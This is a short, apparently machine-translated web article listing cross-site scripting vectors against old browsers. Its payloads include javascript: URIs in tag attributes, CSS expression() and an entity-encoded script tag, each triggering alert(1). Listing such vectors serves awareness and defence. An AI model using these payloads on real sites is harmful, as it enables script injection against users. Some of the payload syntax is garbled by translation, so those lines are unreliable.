HTML 5 Security list

The following is a list of almost all security issues related to HTML 5 in various mainstream browsers. These security issues may be a stepping stone for hackers to attack your website, almost all of them are related to Javascript, so you should pay attention to them.

Http://heideri.ch/jso/

The following are a few examples:

1) <table background = "javascript: alert (1)">

IE6, 7,8, 9, and Opera 8.x, 9.x, and 10.x both support this syntax.

2) <meta charset = "mac-farsi"> invalid script using alert (1) failed/script failed

This problem exists in all Firefox versions and allows users to perform XSS (Cross-Site Scripting) attacks.

3) <script> & amp; # x61; l & amp; # x65; rt & amp; #40; 1) </script>

Between the TAG of <script> and <style>, the script can be run based on the TAG. This is problematic in all versions of Firefox, Opera, and Chrome.

4) ({set/**/$ ($) {_/**/setter =$, _ = 1}). $ = alert

The above is a syntax of Firefox and XSS attacks are also generated.

5) <div style = "font-family: foo} x = expression (write (1);"> XXX </div>

Since IE5.5 and later, IE can support the above syntax until IE9.

6) scripts can be run in src, for example:

<Embed src = "javascript: alert (1)">

<Image src = "javascript: alert (1)">
<Script src = "javascript: alert (1)">

Another XSS attack, almost all browsers support this method, such as: All Firefox versions, Chrome 4.x/ 5.x, Opera 8.x/ 9.x/ 10.0, IE 6.0/7.0, and Safari 3.x/ 4.x

There are many other websites that are updated frequently. In general, both IE and Firefox have security issues. Safari seems to be the least problematic.